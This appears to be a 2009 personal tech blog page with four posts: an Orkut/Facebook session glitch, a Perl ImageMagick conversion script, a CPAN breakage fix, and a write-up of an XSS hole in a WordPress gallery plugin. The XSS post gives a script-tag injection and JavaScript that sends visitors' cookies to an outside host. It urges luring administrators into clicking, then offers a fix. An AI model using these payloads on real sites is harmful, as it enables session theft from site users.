Friday, July 31, 2009

This is what happens when you develop Orkut and Facebook Applications Simultaneously

The thing


Need I explain more?

Just in case, its a dialog to add the application profile view into your Facebook profile, within Orkut.

Technical Details
Its just the Session variables screwing up, everything is fine. Although I could not resist putting up a screen shot of it. Are you an application developer? Let me know...

Monday, July 27, 2009

Perl ImageMagick convert Images from one format to another

Introduction
A Picture speaks louder than a thousand words. Most of the programming problems I usually worked with and involved in where dealing with just TEXT. So now I wanted to programatically work with images. I needed to warp, rotate, scale, stretch, convert from jpeg to png, png to jpeg, jpeg to bmp, bmp to jpeg etc. So I decided to search on how to do such a thing easily. Well the first obvious answer is to do handle all these in C reading files uncompressing based on the extensions, compressing, write the encoders and do whole lot of "Reinventing the wheel" stuff. So I found this software called ImageMagick which already wrote the codes to do all these for you, and what more? It has a neat Perl API so that you can do the fun stuff that you do on perl on images. Now that's sweet.

Hello World
Now just check out this simple script to convert files from one format to another.


#!/usr/bin/perl
#
#usage: perl im.pl <Source File> <Destination File>
#

use strict;
use Image::Magick;

my $q = Image::Magick->new;

my $source = $ARGV[0];
my $dest = $ARGV[1];

$q->Read($source);
$q->Write(filename=>$dest);

exit;


That is all that is required to convert file from one format to another using ImageMagick and the Perl Image Magick API. For example
perl im.pl IMG_0021.JPG IMG_0021.BMP

would convert the JPG to BMP for you.

Friday, July 17, 2009

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

Intro

Now I need not tell what actually an XSS is, for that refer to here. To see what I mean check out the links given below. If you are using NextGen wordpress plugin, you are probably infected.

the Vulnerability

The vulnerability on this wordpress plugin is seen in the pid, album, gallery GET variables.

http://www.example.com/wordpress/next-gen-gallery/?album=1&
pid=3&
gallery=2


The GET variables on most sites are printed directly onto the <title> html tag on the pages. So if you try something like
next-gen-gallery/?album=1&pid=3&
gallery=2(XSS HOLE CAN BE HERE)

the Title becomes
<title>Picture 3 &laquo; Album 1 
&laquo; Gallery 2(XSS HOLE CAN BE HERE)
&laquo; Next Gen Gallery &laquo;
xxxxxxxxxxx WordPress Demo</title>


So we can insert our own custom HTML into the get query to include harmless HTML tags and dangerous SCRIPT tags to allow for Cross Site Scripting. Since Wordpress is in PHP, by default the magic_quotes_gpc would be turned on (for older PHP installations) the quotes would be escaped. So the simple tests for XSS like

next-gen-gallery/?album=1&pid=3&
gallery=2<title/><script>alert("hi");</script>

would fail. Since the quotes on the "hi" would appear as \"hi\". However why worry with the quotes when something like this works.

next-gen-gallery/?album=1&pid=3&
gallery=2<title/><script src=http://labs.kitiyo.com/store.php></script>


You can put any arbitrary code on the target file and it would get executed on the website. The following code can be put for stealing the cookie:
(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location='+window.location;
window.location = "URL back to the page";


Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)

I am infected now what to do? (for webmaster)
The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug in should note this and please do the required validation on the GET parameter. Since the parameters are numeric this should not be so hard to apply a
is_numeric
check to the parameters.

Don't Believe? Check out these links (XSS Demo)


Happy hacking ...
Fix the bugs
Cheers....

Wednesday, July 8, 2009

yum/apt-get update Breaks Perl CPAN

Doing an yum update or apt-get update and upgrading your system might break the PERL installation, the output I got while doing so: (after an update).


[root@desktop]# cpan

cpan shell -- CPAN exploration and modules installation (v1.7602)
ReadLine support enabled

cpan> install WWW::Mechanize
CPAN: Storable loaded ok
Going to read /root/.cpan/Metadata
Database was generated on Mon, 15 Jun 2009 02:27:28 GMT
Going to read /root/.cpan/sources/authors/01mailrc.txt.gz
CPAN: Compress::Zlib loaded ok
Going to read /root/.cpan/sources/modules/02packages.details.txt.gz
Database was generated on Wed, 08 Jul 2009 02:28:24 GMT
CPAN: HTTP::Date loaded ok

There's a new CPAN.pm version (v1.9402) available!
[Current version is v1.7602]
You might want to try
install Bundle::CPAN
reload cpan
without quitting the current session. It should be a seamless upgrade
while we are running...

CPAN: LWP::UserAgent loaded ok
Fetching with LWP:
ftp://ftp.jaist.ac.jp/pub/CPAN/modules/03modlist.data.gz
LWP failed with code[500] message[Errno architecture (i386-linux-thread-multi-2.6.18-53.1.14.el5pae) does not match executable architecture (i386-linux-thread-multi-2.6.18-53.el5) at /usr/lib/perl5/site_perl/5.8.8/Errno.pm line 11.
Compilation failed in require at /usr/lib/perl5/5.8.8/i386-linux-thread-multi/IO/Socket.pm line 17.
BEGIN failed--compilation aborted at /usr/lib/perl5/5.8.8/i386-linux-thread-multi/IO/Socket.pm line 17.
Compilation failed in require at /usr/lib/perl5/5.8.8/Net/FTP.pm line 18.
BEGIN failed--compilation aborted at /usr/lib/perl5/5.8.8/Net/FTP.pm line 18.
Compilation failed in require at /usr/lib/perl5/site_perl/5.8.8/LWP/Protocol/ftp.pm line 21.
]
Fetching with Net::FTP:
ftp://ftp.jaist.ac.jp/pub/CPAN/modules/03modlist.data.gz
Can't locate object method "new" via package "Net::FTP" at /usr/lib/perl5/5.8.8/CPAN.pm line 2250.


This is due to the architecture check and differences that PERL encounters on Errno.pm module.

Fix
This can be called a fix or rather a tweak by commenting out these lines (Add #'s to the beginning) on
/usr/lib/perl5/site_perl/5.8.8/Errno.pm


"$Config{'archname'}-$Config{'osvers'}" eq
"i386-linux-thread-multi-2.6.18-53.1.14.el5pae" or
die "Errno architecture (i386-linux-thread-multi-2.6.18-53.1.14.el5pae) does not match executable architecture ($Config{'archname'}-$Config{'osvers'})";

Change the lines to:

#"$Config{'archname'}-$Config{'osvers'}" eq
#"i386-linux-thread-multi-2.6.18-53.1.14.el5pae" or
# die "Errno architecture (i386-linux-thread-multi-2.6.18-53.1.14.el5pae) does not match executable architecture ($Config{'archname'}-$Config{'osvers'})";